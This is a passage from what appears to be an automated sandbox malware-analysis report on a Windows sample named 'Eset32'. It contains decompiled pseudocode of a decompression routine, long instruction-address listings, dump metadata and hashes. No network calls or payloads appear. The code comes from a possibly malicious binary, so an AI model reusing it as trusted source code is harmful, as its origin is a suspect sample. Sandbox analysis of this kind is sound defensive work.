													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                          0x00406945
                                                          0x00406945
                                                          0x00406945
                                                          0x00406945
                                                          0x00406945
                                                          0x00406949
                                                          0x00000000
                                                          0x00000000
                                                          0x0040694f
                                                          0x0040694f
                                                          0x00406952
                                                          0x00406955
                                                          0x0040695a
                                                          0x0040695c
                                                          0x0040695f
                                                          0x00406962
                                                          0x00406965
                                                          0x00406965
                                                          0x00406968
                                                          0x00000000
                                                          0x00000000
                                                          0x0040696a
                                                          0x0040696a
                                                          0x0040696d
                                                          0x00406972
                                                          0x00406974
                                                          0x00406977
                                                          0x0040697d
                                                          0x004066dc
                                                          0x004066dc
                                                          0x004066df
                                                          0x004066e5
                                                          0x004066eb
                                                          0x004066f4
                                                          0x004066fa
                                                          0x004066fd
                                                          0x00406704
                                                          0x00406709
                                                          0x0040670f
                                                          0x0040671a
                                                          0x0040671a
                                                          0x00406983
                                                          0x00406983
                                                          0x0040698d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406993
                                                          0x00406993
                                                          0x00406997
                                                          0x0040699a
                                                          0x0040699a
                                                          0x0040699e
                                                          0x004069a4
                                                          0x004069a4
                                                          0x004069a7
                                                          0x004069aa
                                                          0x004069b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004069b2
                                                          0x004069d4
                                                          0x004069d4
                                                          0x004069d7
                                                          0x00000000
                                                          0x00000000
                                                          0x004069b4
                                                          0x004069b8
                                                          0x00000000
                                                          0x00000000
                                                          0x004069be
                                                          0x004069be
                                                          0x004069c1
                                                          0x004069c4
                                                          0x004069c9
                                                          0x004069cb
                                                          0x004069ce
                                                          0x004069d1
                                                          0x004069d1
                                                          0x004069d9
                                                          0x004069d9
                                                          0x004069df
                                                          0x004069e2
                                                          0x004069e5
                                                          0x004069e5
                                                          0x004069ec
                                                          0x004069f0
                                                          0x004069f4
                                                          0x004069f7
                                                          0x004069fa
                                                          0x00406a00
                                                          0x00406a05
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a07
                                                          0x00406a1b
                                                          0x00406a1b
                                                          0x00406a1f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a09
                                                          0x00406a0c
                                                          0x00406a0c
                                                          0x00406a13
                                                          0x00406a18
                                                          0x00406a18
                                                          0x00406a18
                                                          0x00406a21
                                                          0x00406a21
                                                          0x00406a24
                                                          0x00406a32
                                                          0x00406a38
                                                          0x00406a3d
                                                          0x00406a43
                                                          0x00406a49
                                                          0x00406a4f
                                                          0x00406a56
                                                          0x00406a6a
                                                          0x00406a6a
                                                          0x00407039
                                                          0x00407039
                                                          0x00407039
                                                          0x0040703e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406676
                                                          0x00406676
                                                          0x00000000
                                                          0x00406c71
                                                          0x00406c71
                                                          0x00406c75
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c84
                                                          0x00406c84
                                                          0x00406ca9
                                                          0x00406ca9
                                                          0x00406ca9
                                                          0x00406cab
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c89
                                                          0x00406c89
                                                          0x00406c8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c93
                                                          0x00406c93
                                                          0x00406c96
                                                          0x00406c99
                                                          0x00406c9c
                                                          0x00406c9e
                                                          0x00406ca0
                                                          0x00406ca3
                                                          0x00406ca6
                                                          0x00406ca6
                                                          0x00406ca6
                                                          0x00406cad
                                                          0x00406cad
                                                          0x00406cb5
                                                          0x00406cb8
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc2
                                                          0x00406cc5
                                                          0x00406cc7
                                                          0x00406cca
                                                          0x00406ccc
                                                          0x00406ce0
                                                          0x00406ce0
                                                          0x00406ce3
                                                          0x00406cfd
                                                          0x00406cfd
                                                          0x00406d00
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d06
                                                          0x00406d06
                                                          0x00406d09
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0f
                                                          0x00406d0f
                                                          0x00000000
                                                          0x00406d0f
                                                          0x00406ce5
                                                          0x00406ce8
                                                          0x00406cef
                                                          0x00406cf2
                                                          0x00000000
                                                          0x00406cf2
                                                          0x00406cce
                                                          0x00406cd2
                                                          0x00406cd5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d1a
                                                          0x00406d1a
                                                          0x00406d3f
                                                          0x00406d3f
                                                          0x00406d3f
                                                          0x00406d41
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d1f
                                                          0x00406d1f
                                                          0x00406d23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d34
                                                          0x00406d36
                                                          0x00406d39
                                                          0x00406d3c
                                                          0x00406d3c
                                                          0x00406d3c
                                                          0x00406d43
                                                          0x00406d4b
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d53
                                                          0x00406d56
                                                          0x00406d56
                                                          0x00406d58
                                                          0x00406d5c
                                                          0x00406d5f
                                                          0x00406d62
                                                          0x00406d65
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d6b
                                                          0x00406d6b
                                                          0x00406d90
                                                          0x00406d90
                                                          0x00406d90
                                                          0x00406d92
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d70
                                                          0x00406d70
                                                          0x00406d74
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d7a
                                                          0x00406d7a
                                                          0x00406d7d
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00406d85
                                                          0x00406d87
                                                          0x00406d8a
                                                          0x00406d8d
                                                          0x00406d8d
                                                          0x00406d8d
                                                          0x00406d94
                                                          0x00406d94
                                                          0x00406d9c
                                                          0x00406d9f
                                                          0x00406da2
                                                          0x00406da5
                                                          0x00406da9
                                                          0x00406dac
                                                          0x00406dae
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406dce
                                                          0x00406dce
                                                          0x00406dd1
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dd7
                                                          0x00406dd7
                                                          0x00406dda
                                                          0x00406de1
                                                          0x00000000
                                                          0x00406de1
                                                          0x00406db6
                                                          0x00406db9
                                                          0x00406dc0
                                                          0x00406dc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406de9
                                                          0x00406de9
                                                          0x00406e0e
                                                          0x00406e0e
                                                          0x00406e0e
                                                          0x00406e10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dee
                                                          0x00406dee
                                                          0x00406df2
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfb
                                                          0x00406dfe
                                                          0x00406e01
                                                          0x00406e03
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0b
                                                          0x00406e0b
                                                          0x00406e0b
                                                          0x00406e12
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e22
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e27
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e2d
                                                          0x00406e2d
                                                          0x00406e30
                                                          0x00406e35
                                                          0x00406e37
                                                          0x00406e3d
                                                          0x00406e3f
                                                          0x00406e54
                                                          0x00406e56
                                                          0x00406e56
                                                          0x00406e41
                                                          0x00406e47
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e4b
                                                          0x00406e58
                                                          0x00406e5c
                                                          0x00406e5f
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e68
                                                          0x00406e68
                                                          0x00406e68
                                                          0x00406e6a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e70
                                                          0x00406e70
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e9d
                                                          0x00406ea0
                                                          0x00406ea6
                                                          0x00406eab
                                                          0x00406eb1
                                                          0x00406eb7
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ec5
                                                          0x00406ecb
                                                          0x00406ecb
                                                          0x00406ebe
                                                          0x00406ec0
                                                          0x00406ec2
                                                          0x00406ec2
                                                          0x00406ecd
                                                          0x00406ed3
                                                          0x00406ed5
                                                          0x00406ed8
                                                          0x00406eda
                                                          0x00406ee0
                                                          0x00406ee2
                                                          0x00406ee4
                                                          0x00406ee6
                                                          0x00406ee8
                                                          0x00406eeb
                                                          0x00406ef4
                                                          0x00406ef7
                                                          0x00406ef7
                                                          0x00406eed
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef0
                                                          0x00406eeb
                                                          0x00406ee2
                                                          0x00406ef9
                                                          0x00406efb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406efb
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e80
                                                          0x00406e86
                                                          0x00406e88
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e8a
                                                          0x00406e8a
                                                          0x00406e8c
                                                          0x00406e8e
                                                          0x00406e97
                                                          0x00406e97
                                                          0x00406e90
                                                          0x00406e90
                                                          0x00406e93
                                                          0x00406e93
                                                          0x00406e99
                                                          0x00406e9b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f01
                                                          0x00406f01
                                                          0x00406f06
                                                          0x00406f08
                                                          0x00406f09
                                                          0x00406f0a
                                                          0x00406f0b
                                                          0x00406f11
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1c
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f2e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f33
                                                          0x00406f33
                                                          0x00406f36
                                                          0x00406f39
                                                          0x00406f3b
                                                          0x00406fd2
                                                          0x00406fd2
                                                          0x00406fd5
                                                          0x00406fd7
                                                          0x00406fd8
                                                          0x00406fd9
                                                          0x00406fdc
                                                          0x00000000
                                                          0x00406fdc
                                                          0x00406f41
                                                          0x00406f41
                                                          0x00406f47
                                                          0x00406f49
                                                          0x00406f6e
                                                          0x00406f71
                                                          0x00406f77
                                                          0x00406f7c
                                                          0x00406f82
                                                          0x00406f88
                                                          0x00406f8a
                                                          0x00406f8d
                                                          0x00406f96
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f8f
                                                          0x00406f91
                                                          0x00406f93
                                                          0x00406f93
                                                          0x00406f9e
                                                          0x00406fa4
                                                          0x00406fa6
                                                          0x00406fa9
                                                          0x00406fab
                                                          0x00406fb1
                                                          0x00406fb3
                                                          0x00406fb5
                                                          0x00406fb7
                                                          0x00406fb9
                                                          0x00406fbc
                                                          0x00406fc5
                                                          0x00406fc8
                                                          0x00406fc8
                                                          0x00406fbe
                                                          0x00406fbe
                                                          0x00406fc1
                                                          0x00406fc1
                                                          0x00406fbc
                                                          0x00406fb3
                                                          0x00406fca
                                                          0x00406fcc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fcc
                                                          0x00406f4b
                                                          0x00406f4b
                                                          0x00406f51
                                                          0x00406f57
                                                          0x00406f59
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f5b
                                                          0x00406f5b
                                                          0x00406f5d
                                                          0x00406f5f
                                                          0x00406f66
                                                          0x00406f66
                                                          0x00406f68
                                                          0x00406f61
                                                          0x00406f61
                                                          0x00406f63
                                                          0x00406f63
                                                          0x00406f6a
                                                          0x00406f6c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fe4
                                                          0x00406fe4
                                                          0x00406fe7
                                                          0x00406fe9
                                                          0x00406fec
                                                          0x00406fef
                                                          0x00406fef
                                                          0x00406fef
                                                          0x00406fef
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040669d
                                                          0x00406681
                                                          0x00000000
                                                          0x00406687
                                                          0x0040668a
                                                          0x00406694
                                                          0x00406697
                                                          0x0040669a
                                                          0x00000000
                                                          0x0040669a
                                                          0x00406681
                                                          0x004066a5
                                                          0x004066a8
                                                          0x004066ac
                                                          0x004066b6
                                                          0x004066c0
                                                          0x004066c3
                                                          0x004066c9
                                                          0x004067fd
                                                          0x004067ff
                                                          0x00406805
                                                          0x00406808
                                                          0x0040680b
                                                          0x00000000
                                                          0x0040680b
                                                          0x004066cf
                                                          0x004066cf
                                                          0x004066d0
                                                          0x00406728
                                                          0x00406728
                                                          0x0040672f
                                                          0x004067d5
                                                          0x004067d5
                                                          0x004067da
                                                          0x004067dd
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067ea
                                                          0x004067ed
                                                          0x004067f2
                                                          0x004067f5
                                                          0x004067f5
                                                          0x00000000
                                                          0x00406735
                                                          0x00406735
                                                          0x00406735
                                                          0x00406735
                                                          0x00406739
                                                          0x00406739
                                                          0x0040675b
                                                          0x0040675e
                                                          0x00406760
                                                          0x00406763
                                                          0x00406768
                                                          0x0040673e
                                                          0x0040673e
                                                          0x00406743
                                                          0x00406745
                                                          0x00406747
                                                          0x0040674c
                                                          0x00406752
                                                          0x00406757
                                                          0x00406759
                                                          0x00406759
                                                          0x0040674e
                                                          0x0040674e
                                                          0x0040674e
                                                          0x0040674c
                                                          0x00000000
                                                          0x0040676a
                                                          0x00406797
                                                          0x0040679c
                                                          0x0040679e
                                                          0x0040679f
                                                          0x004067a1
                                                          0x004067a2
                                                          0x004067a2
                                                          0x004067a2
                                                          0x004067ca
                                                          0x004067cf
                                                          0x004067cf
                                                          0x00000000
                                                          0x004067cf
                                                          0x00406768
                                                          0x0040672f
                                                          0x004066d2
                                                          0x004066d2
                                                          0x004066d3
                                                          0x0040671d
                                                          0x00000000
                                                          0x0040671d
                                                          0x004066d5
                                                          0x004066d6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406832
                                                          0x00406832
                                                          0x00406832
                                                          0x00406835
                                                          0x00000000
                                                          0x00000000
                                                          0x00406812
                                                          0x00406812
                                                          0x00406816
                                                          0x00000000
                                                          0x00000000
                                                          0x0040681c
                                                          0x0040681c
                                                          0x0040681f
                                                          0x00406822
                                                          0x00406827
                                                          0x00406829
                                                          0x0040682c
                                                          0x0040682f
                                                          0x0040682f
                                                          0x0040682f
                                                          0x00406837
                                                          0x00406837
                                                          0x0040683a
                                                          0x0040683c
                                                          0x00406841
                                                          0x00406844
                                                          0x00406846
                                                          0x00406849
                                                          0x00000000
                                                          0x00000000
                                                          0x0040684f
                                                          0x0040684f
                                                          0x00406851
                                                          0x00000000
                                                          0x00000000
                                                          0x00406857
                                                          0x00406857
                                                          0x0040685b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406861
                                                          0x00406861
                                                          0x00406864
                                                          0x00406866
                                                          0x00406904
                                                          0x00406904
                                                          0x00406907
                                                          0x00406909
                                                          0x00406909
                                                          0x0040690c
                                                          0x0040690f
                                                          0x00406911
                                                          0x00406913
                                                          0x00406915
                                                          0x00406915
                                                          0x0040691e
                                                          0x00406923
                                                          0x00406926
                                                          0x00406929
                                                          0x0040692c
                                                          0x0040692f
                                                          0x0040692f
                                                          0x0040692f
                                                          0x00406932
                                                          0x00406938
                                                          0x00406938
                                                          0x0040693e
                                                          0x0040693e
                                                          0x0040693e
                                                          0x00000000
                                                          0x00406932
                                                          0x0040686c
                                                          0x0040686c
                                                          0x00406872
                                                          0x00406875
                                                          0x00406877
                                                          0x004068a2
                                                          0x004068a5
                                                          0x004068ab
                                                          0x004068b0
                                                          0x004068b6
                                                          0x004068bc
                                                          0x004068be
                                                          0x004068c1
                                                          0x004068ca
                                                          0x004068d0
                                                          0x004068d0
                                                          0x004068c3
                                                          0x004068c5
                                                          0x004068c7
                                                          0x004068c7
                                                          0x004068d2
                                                          0x004068d8
                                                          0x004068db
                                                          0x004068dd
                                                          0x004068df
                                                          0x004068e5
                                                          0x004068e7
                                                          0x004068e9
                                                          0x004068ec
                                                          0x004068f5
                                                          0x004068f5
                                                          0x004068f7
                                                          0x004068ee
                                                          0x004068ee
                                                          0x004068f1
                                                          0x004068f1
                                                          0x004068f9
                                                          0x004068f9
                                                          0x004068e7
                                                          0x004068fc
                                                          0x004068fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004068fe
                                                          0x00406879
                                                          0x00406879
                                                          0x0040687f
                                                          0x00406885
                                                          0x00406887
                                                          0x00000000
                                                          0x00000000
                                                          0x00406889
                                                          0x00406889
                                                          0x0040688b
                                                          0x0040688d
                                                          0x00406890
                                                          0x00406897
                                                          0x00406897
                                                          0x00406899
                                                          0x00406892
                                                          0x00406892
                                                          0x00406894
                                                          0x00406894
                                                          0x0040689b
                                                          0x0040689d
                                                          0x004068a0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004069a4
                                                          0x004069a7
                                                          0x004069aa
                                                          0x004069b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b87
                                                          0x00406b87
                                                          0x00406b87
                                                          0x00406b8a
                                                          0x00406b8d
                                                          0x00406b8f
                                                          0x00406b92
                                                          0x00406b98
                                                          0x00406b9f
                                                          0x00406ba1
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a75
                                                          0x00406a75
                                                          0x00406a9d
                                                          0x00406a9d
                                                          0x00406a9d
                                                          0x00406a9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a7d
                                                          0x00406a7d
                                                          0x00406a81
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a87
                                                          0x00406a87
                                                          0x00406a8a
                                                          0x00406a8d
                                                          0x00406a90
                                                          0x00406a92
                                                          0x00406a94
                                                          0x00406a97
                                                          0x00406a9a
                                                          0x00406a9a
                                                          0x00406a9a
                                                          0x00406aa1
                                                          0x00406aa1
                                                          0x00406aa9
                                                          0x00406aac
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab9
                                                          0x00406abd
                                                          0x00406ac0
                                                          0x00406ac3
                                                          0x00406adb
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406aec
                                                          0x00406aef
                                                          0x00406ae0
                                                          0x00406ae0
                                                          0x00406ae2
                                                          0x00406ae9
                                                          0x00406ae9
                                                          0x00406b18
                                                          0x00406b18
                                                          0x00406b18
                                                          0x00406b1b
                                                          0x00406b1d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406af8
                                                          0x00406af8
                                                          0x00406afc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b02
                                                          0x00406b02
                                                          0x00406b05
                                                          0x00406b08
                                                          0x00406b0b
                                                          0x00406b0d
                                                          0x00406b0f
                                                          0x00406b12
                                                          0x00406b15
                                                          0x00406b15
                                                          0x00406b15
                                                          0x00406b1f
                                                          0x00406b1f
                                                          0x00406b21
                                                          0x00406b23
                                                          0x00406b2e
                                                          0x00406b31
                                                          0x00406b34
                                                          0x00406b36
                                                          0x00406b38
                                                          0x00406b3a
                                                          0x00406b3d
                                                          0x00406b40
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b55
                                                          0x00406b58
                                                          0x00406b5a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b60
                                                          0x00406b60
                                                          0x00406b64
                                                          0x00406b75
                                                          0x00406b75
                                                          0x00406b75
                                                          0x00406b77
                                                          0x00406b77
                                                          0x00406b7b
                                                          0x00406b7b
                                                          0x00406b7b
                                                          0x00406b7d
                                                          0x00406b7e
                                                          0x00406b81
                                                          0x00406b81
                                                          0x00406b81
                                                          0x00406b84
                                                          0x00000000
                                                          0x00406b84
                                                          0x00406b66
                                                          0x00406b66
                                                          0x00406b69
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b6f
                                                          0x00406b6f
                                                          0x00000000
                                                          0x00406b6f
                                                          0x00406ac5
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac9
                                                          0x00406acc
                                                          0x00406acf
                                                          0x00406ad3
                                                          0x00406ad3
                                                          0x00406ba7
                                                          0x00406ba7
                                                          0x00406baa
                                                          0x00406bb1
                                                          0x00406bb5
                                                          0x00406bb7
                                                          0x00406bba
                                                          0x00406bbd
                                                          0x00406bc2
                                                          0x00406bc5
                                                          0x00406bc7
                                                          0x00406bc8
                                                          0x00406bcb
                                                          0x00406bd6
                                                          0x00406bd9
                                                          0x00406bf0
                                                          0x00406bf5
                                                          0x00406bfc
                                                          0x00406c01
                                                          0x00406c05
                                                          0x00406c07
                                                          0x00406c07
                                                          0x00406c07
                                                          0x00406c0a
                                                          0x00406c0c
                                                          0x00000000
                                                          0x00406c12
                                                          0x00406c12
                                                          0x00406c16
                                                          0x00406c21
                                                          0x00406c34
                                                          0x00406c39
                                                          0x00406c3e
                                                          0x00406c40
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c46
                                                          0x00406c46
                                                          0x00406c49
                                                          0x00406c4b
                                                          0x00406c59
                                                          0x00406c59
                                                          0x00406c5c
                                                          0x00406c5c
                                                          0x00406c5f
                                                          0x00406c62
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6e
                                                          0x00000000
                                                          0x00406c6e
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ff2
                                                          0x00406ff2
                                                          0x00406ff8
                                                          0x00406ffe
                                                          0x00407003
                                                          0x00407009
                                                          0x0040700f
                                                          0x00407011
                                                          0x00407014
                                                          0x0040701d
                                                          0x00407023
                                                          0x00407023
                                                          0x00407016
                                                          0x00407018
                                                          0x0040701a
                                                          0x0040701a
                                                          0x00407025
                                                          0x00407027
                                                          0x0040702a
                                                          0x00407065
                                                          0x00407065
                                                          0x00000000
                                                          0x0040702c
                                                          0x0040702c
                                                          0x0040702c
                                                          0x00407032
                                                          0x00407035
                                                          0x00407037
                                                          0x0040706c
                                                          0x0040706e
                                                          0x00000000
                                                          0x0040706e
                                                          0x00000000
                                                          0x00407037
                                                          0x00000000
                                                          0x00406676
                                                          0x00407044
                                                          0x00000000
                                                          0x00407044
                                                          0x00406a58
                                                          0x00406a5a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a5f
                                                          0x00000000
                                                          0x00406a5f
                                                          0x004069a4
                                                          0x00406965
                                                          0x00407049
                                                          0x0040704c
                                                          0x0040704e
                                                          0x00407057
                                                          0x0040705d
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                          • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                          • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                          • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040711C Relevance: .3, Instructions: 300COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
